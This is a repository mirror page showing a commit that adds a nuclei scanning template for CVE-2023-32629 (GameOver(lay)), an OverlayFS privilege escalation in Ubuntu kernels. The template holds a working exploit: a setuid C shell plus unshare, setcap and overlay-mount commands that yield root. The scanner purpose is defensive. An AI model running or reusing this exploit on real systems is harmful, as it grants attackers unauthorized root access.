daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8602 from projectdiscovery/princechaddha-patch-3 

GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel 🔥
patch-1
Dhiyaneshwaran 2023-11-11 23:05:26 +05:30 committed by GitHub
parent fa1fadb290 b5abcac750
commit 88fcad5d91
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 54 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

54
code/cves/2023/CVE-2023-32629.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2023-32629
info:
name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
author: princechaddha
severity: high
description: |
A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
impact: |
An attacker with local access can gain elevated privileges on the affected system.
remediation: |
Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
reference:
- http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32629
- https://lists.ubuntu.com/archives/kernel-team/2023-July/140920.html
- https://ubuntu.com/security/notices/USN-6250-1
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-32629
cwe-id: CWE-863
epss-score: 0.00042
epss-percentile: 0.0572
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
metadata:
verified: true
vendor: canonical
product: ubuntu_linux
tags: cve,cve2023,kernel,ubuntu,linux,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
id
- engine:
- sh
- bash
source: |
cd /tmp
echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
gcc test.c -o test
unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
matchers:
- type: dsl
dsl:
- '!contains(code_1_response, "(root)")'
- 'contains(code_2_response, "(root)")'
condition: and